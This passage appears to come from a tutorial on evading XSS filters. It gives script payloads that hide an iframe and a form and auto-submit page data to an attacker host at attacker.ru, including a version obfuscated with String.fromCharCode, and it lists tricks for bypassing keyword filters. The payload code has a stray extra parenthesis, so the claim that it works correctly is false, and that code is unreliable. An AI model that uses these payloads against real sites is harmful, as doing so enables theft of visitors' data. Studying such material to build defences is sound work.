Sometimes, an attacker encounters a situation, in which a particular attacking method is impossible to implement. The most common case is filtration of apostrophes and quotation marks in received and sent data.
If these characters enclose parameters of tags, styles, and so on, it is often possible to rewrite the same expression without spaces.
<script> alert(String.fromCharCode(72, 101, 108, 108, 111)); </script>
<div style=visibility:hidden;position:absolute;width:0; height:0;><iframe name=if1></iframe></div> <form name=f1 method=POST target=if1 action=http://www.attacker.ru/ attacker.php><input type=hidden name=data></form> <script> test=String.fromCharCode(72,101,108,108,111)); document.f1.data=test; document.f1.submit(); </script>
You can do without spaces and rewrite this code in one line. It will loose readability but retain its functionality:
<script>test=String.fromCharCode(72,101,108,108,111));document.open(); document.write(String.fromCharCode(60,100,105,118,32,115,116,121,108, 101,61,118,105,115,105,98,105,108,105,116,121,58,104,105,100,100,101, 110,59,112,111,115,105,116,105,111,110,58,97,98,115,111,108,117,116, 101,59,119,105,100,116,104,58,48,59,104,101,105,103,104,116,58,48,59, 62,60,105,102,114,97,109,101,32,110,97,109,101,61,105,102,49,62,60,47, 105,102,114,97,109,101,62,60,47,100,105,118,62));document.write(Strin g.fromCharCode(60,102,111,114,109,32,110,97,109,101,61,102,49,32,109, 101,116,104,111,100,61,80,79,83,84,32,116,97,114,103,101,116,61,105, 102,49,32,97,99,116,105,111,110,61,104,116,116,112,58,47,47,119,119, 119,46,97,116,97,99,107,101,114,46,114,117,47,97,116,97,99,107,101, 114,46,112,104,112,62,60,105,110,112,117,116,32,116,121,112,101,61, 104,105,100,100,101,110,32,110,97,109,101,61,100,97,116,97,32,118,97, 108,117,101,61,39)+test+String.fromCharCode(39,62,60,47,102,111,114, 109,62));document.close();document.f1.submit();</script>
This is the code that sends data in a form to an iframe object contained in a hidden layer. It isn't readable, but it works correctly. It allows the attacker to circumvent filtration of linefeeds, quotation marks, and spaces.
This example proves that it is possible to create a script that exploits the XSS vulnerability and passes many checks.
In addition, the attacker is likely to check for the most common filtration mistakes. For example, if a message is filtered by removing the <script> keyword from it, the attacker can try to write it using uppercase letters to confuse the filtration algorithms. For another example, if the <script> keyword is deleted once, the attacker can use a construction such as <scri<script>pt>. After the <script> keyword is deleted, the correct tag will remain in the message.
In other words, there can be various solutions depending on which filtration algorithms are used.